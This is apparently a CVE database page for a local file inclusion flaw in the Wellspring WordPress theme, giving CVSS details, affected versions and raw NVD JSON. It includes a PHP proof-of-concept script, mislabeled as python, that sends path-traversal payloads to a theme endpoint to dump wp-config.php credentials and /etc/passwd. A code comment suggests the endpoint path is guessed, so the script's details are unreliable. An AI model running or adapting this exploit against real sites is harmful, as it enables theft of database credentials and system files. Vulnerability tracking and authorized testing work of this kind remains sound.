Security Vulnerability Report
中文
CVE-2025-67934 CVSS 8.1 HIGH

CVE-2025-67934

Published: 2026-01-08 10:15:53
Last Modified: 2026-04-27 18:16:51

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wellspring wellspring allows PHP Local File Inclusion.This issue affects Wellspring: from n/a through < 2.8.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:wellspring:*:*:*:*:*:wordpress:*:* - VULNERABLE
Wellspring < 2.8
Wellspring from n/a through < 2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-67934 PoC - WordPress Wellspring Theme Local File Inclusion * Target: Mikado-Themes Wellspring < 2.8 * Type: Local File Inclusion (LFI) * * Usage: php cve-2025-67934.py <target_url> * Example: php cve-2025-67934.py http://example.com */ $target = $argv[1] ?? 'http://localhost'; // Target vulnerable endpoint - adjust path based on theme structure echo "[*] CVE-2025-67934 PoC - Wellspring LFI\n"; echo "[*] Target: $target\n\n"; // Read wp-config.php $payload = '../../wp-config.php'; $url = $target . '/wp-content/themes/wellspring/' . 'inc/ajax.php?template=' . urlencode($payload); echo "[+] Attempting to read wp-config.php...\n"; echo "[+] URL: $url\n\n"; $context = stream_context_create(['http' => ['timeout' => 10]]); $response = @file_get_contents($url, false, $context); if ($response && strpos($response, 'DB_NAME') !== false) { echo "[+] SUCCESS! wp-config.php contents:\n"; echo str_repeat('-', 50) . "\n"; echo $response; echo str_repeat('-', 50) . "\n"; } else { echo "[-] Failed to retrieve file or file not found.\n"; echo "[-] Try adjusting the path or check if target is vulnerable.\n"; } // Read /etc/passwd echo "\n[+] Attempting to read /etc/passwd...\n"; $payload2 = '../../../../../../etc/passwd'; $url2 = $target . '/wp-content/themes/wellspring/' . 'inc/ajax.php?template=' . urlencode($payload2); echo "[+] URL: $url2\n\n"; $response2 = @file_get_contents($url2, false, $context); if ($response2 && strpos($response2, 'root:') !== false) { echo "[+] SUCCESS! /etc/passwd contents:\n"; echo str_repeat('-', 50) . "\n"; echo $response2; echo str_repeat('-', 50) . "\n"; } else { echo "[-] Failed to retrieve /etc/passwd\n"; } echo "\n[*] PoC completed.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67934", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:52.533", "lastModified": "2026-04-27T18:16:50.600", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wellspring wellspring allows PHP Local File Inclusion.This issue affects Wellspring: from n/a through < 2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:wellspring:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.8", "matchCriteriaId": "A8DFB8BD-C1A1-4278-A6BC-1DC077570737"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/wellspring/vulnerability/wordpress-wellspring-theme-2-8-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}